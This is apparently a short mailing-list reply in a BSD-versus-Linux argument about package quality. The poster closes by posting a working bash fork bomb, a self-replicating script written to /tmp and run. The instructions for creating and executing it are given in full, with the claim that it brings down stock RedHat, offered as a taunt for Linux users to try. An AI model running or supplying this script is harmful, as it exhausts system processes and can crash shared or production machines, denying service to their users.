Re: BSD Init

> Moreover, you are right; there are binary packages available for the
> BSD systems, but a good lot of them haven't gone through QA testing,
> so YMMV when using them.

 I beg to differ. The *BSD packages and ports are tested. If rpm is so great
then try and update to Gnumeric 1.2.13 and see what happens. Go ahead and
try that in Mandrake SuSE or RedHat.

 BTW while we are on the topic of quality, here is a fork bomb for all you
Linux guys:

$ cat <<! > /tmp/foo.sh
#!/bin/bash
$0 &
$0 &
!
$ chmod +x /tmp/foo.sh
$ /tmp/foo.sh

Run this as a user and it brings down stock RedHat in no time. It does not
effect FreeBSD or NetBSD.

 SCNR